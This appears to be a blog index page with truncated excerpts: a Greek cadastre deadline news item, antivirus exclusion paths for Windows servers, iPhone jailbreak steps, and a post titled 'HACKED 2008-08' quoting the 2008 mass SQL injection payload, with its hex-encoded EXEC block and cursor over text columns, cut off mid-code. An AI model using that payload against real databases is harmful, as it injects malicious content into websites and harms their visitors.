Παράταση έως τις 31 Δεκεμβρίου αναμένεται να δοθεί από την «Κτηματολόγιο ΑΕ», σύμφωνα με εκτιμήσεις συμβολαιογράφων. Οι εκτιμήσεις προβλέπουν πως η τρίτη προθεσμία δεν είναι δυνατόν να αποφευχθεί, καθώς ασφαλιστικοί οργανισμοί, τράπεζες και δημόσιοι φορείς δεν έχουν ακόμα δηλώσει τα …

κτηματολογιο Read more »

2008 Exchange 2007 C:PROGRAM FILESMICROSOFTEXCHANGE SERVERMAILBOXFIRST STORAGE GROUP C:PROGRAM FILESMICROSOFTEXCHANGE SERVERMAILBOXSECOND STORAGE GROUP SQL Servers C:PROGRAM FILESMICROSOFT SQL SERVERMSSQL10.SQLEXPRESSMSSQLDATA C:WSUSSUSDBUPDATESERVICESDBFILES C:PROGRAM FILES (X86)MICROSOFT SQL SERVERMSSQL.1MSSQLDATA C:WINDOWSSYSMSISSEEMSSQL.2005MSSQLDATA   *Domain Controller related exclusions* Active Directory database files = C:WINDOWSNTDS SYSVOL C:WINDOWSSYSVOL NTFRS …

SBS 2003 / 2008 & Antivirus Read more »

Create Account without Visa http://www.tunecore.com/freealbum Install iTunes 7.6.1 Upgrade to 1.1.4 ZiPhone 3.0 Install iTunes 8.0 Upgrade to 2.1 quickpwn21-1   +cydia Install Greek [CYDIA http://ftp4u.gr/iphone/apt/] BiteSMS  [sms forward & delete]

http://www.trustedsource.org/blog/142/New-SQL-Injection-Attack-Infecting-Machines http://it.slashdot.org/article.pl?sid=08/08/12/1943217 DECLARE @S CHAR(4000); SET @S=CAST(0x4445434C41524520405420766  …  37572736F72 AS CHAR(4000)); EXEC(@S); DECLARE @T varchar(255) ,@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN …

HACKED 2008-08 Read more »